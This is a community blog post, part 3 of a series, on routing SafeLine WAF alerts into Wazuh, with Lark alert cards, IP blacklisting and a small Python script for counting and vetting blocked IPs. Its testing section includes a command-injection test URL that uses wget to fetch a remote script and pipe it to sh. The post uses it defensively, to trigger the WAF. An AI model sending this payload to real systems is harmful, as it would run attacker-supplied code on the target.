Integrating Open Source WAF with Wazuh (Part 3)

Carrie - Oct 12 - Dev Community

This article is written by a SafeLine WAF user, 曼联小胖子

Part 1 is here.
Part 2 is here.

Wazuh Agent Configuration

  1. Log in to the SafeLine WAF server and configure ossec to monitor the waf_alert.log file:
vim /var/ossec/etc/ossec.conf

Add the following configuration:

<localfile>
    <log_format>syslog</log_format>
    <location>/var/log/waf_alert/waf_alert.log</location>
</localfile>

It should be like the image below.


  2. Restart the Wazuh agent to apply the configuration:
systemctl restart wazuh-agent

Testing the Setup

Run a vulnerability scan against the website, or submit attack test strings manually, to trigger alerts and check the interception results. For example:

https://a.test.com/view.php?doc=11.jpg&format=swf&isSplit=true&page=||wget http://spotslfy.com/wget.sh -O-|sh

Lark Alert Card

The Lark alert card will display clear messages that all relevant personnel in the group can see.


SafeLine WAF IP Blacklist

You can see the attacking source IP, such as 47.1.1.1, automatically added to the blacklist.


When the attacker tries to access the website again, they will be blocked.


Checking the Number of Blacklisted IPs

To count the total number of blacklisted IPs, check the log:

cat /var/log/waf/block_ip.log


Further Ideas

Due to limited personal resources, there are two additional ideas regarding Lark alerts that I haven’t implemented. If you’re interested and have the development skills, feel free to explore further:

  1. Avoiding False IP Bans: To avoid mistakenly banning IPs, you could add two interactive buttons to the Feishu card message: “Confirm IP Ban” and “Ignore.” Clicking “Confirm IP Ban” would trigger the IP ban and simultaneously send a notification to the group with the handling result.

  2. Alert Data Analysis: Currently, alert information pushed to the Feishu group cannot be statistically analyzed. Feishu multi-dimensional tables have basic Excel capabilities and powerful automation processes. With well-designed table fields, automation configurations, and API development, it can serve as a low-cost security data center and SOAR. For example, it could periodically push security weekly reports to the Feishu security workgroup, periodically summarize malicious IP lists, and push them to security devices.
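As an added example (not code from the original post or from SafeLine/Wazuh), the following script covers two points above: counting the distinct IPs in block_ip.log instead of eyeballing `cat` output, and a pre-ban guard for the "Avoiding False IP Bans" idea that skips private/loopback addresses, an operator allowlist, and one-off hits. The line layout of block_ip.log (`<timestamp> <ip> <reason>`) and the sample lines are constructed assumptions, since the post does not show the real file format.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample in an ASSUMED "<timestamp> <ip> <reason>" layout;
# the real SafeLine block_ip.log format is not shown in the post.
SAMPLE_BLOCK_LOG = """\
2024-10-12T09:12:01 47.1.1.1 command_injection
2024-10-12T09:12:05 47.1.1.1 command_injection
2024-10-12T09:13:44 47.2.3.4 sqli
2024-10-12T09:14:02 10.0.0.5 path_traversal
2024-10-12T09:15:10 47.9.9.9 xss
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<ip>\S+)\s+(?P<reason>\S+)")


def parse_block_log(text):
    """Return (timestamp, ip, reason) tuples; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((m["ts"], m["ip"], m["reason"]))
    return events


def count_blocked_ips(events):
    """Number of distinct blacklisted IPs (the de-duplicated view of block_ip.log)."""
    return len({ip for _, ip, _ in events})


def ban_candidates(events, allowlist=(), min_hits=2):
    """IPs that pass the false-ban guards: not private/loopback, not in the
    operator allowlist (CIDR strings), and seen at least min_hits times."""
    allowed = [ipaddress.ip_network(a) for a in allowlist]
    hits = Counter(ip for _, ip, _ in events)
    candidates = {}
    for ip, n in hits.items():
        addr = ipaddress.ip_address(ip)
        if addr.is_private or addr.is_loopback:
            continue  # internal scanners and NAT sources should never be auto-banned
        if any(addr in net for net in allowed):
            continue  # partner / monitoring ranges the operator has allowlisted
        if n >= min_hits:
            candidates[ip] = n
    return candidates


if __name__ == "__main__":
    ev = parse_block_log(SAMPLE_BLOCK_LOG)
    print("distinct blocked IPs:", count_blocked_ips(ev))
    print("ban candidates:", ban_candidates(ev))
```

In production, replace SAMPLE_BLOCK_LOG with the contents of /var/log/waf/block_ip.log and adapt LINE_RE to the actual line layout.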

That's the end.
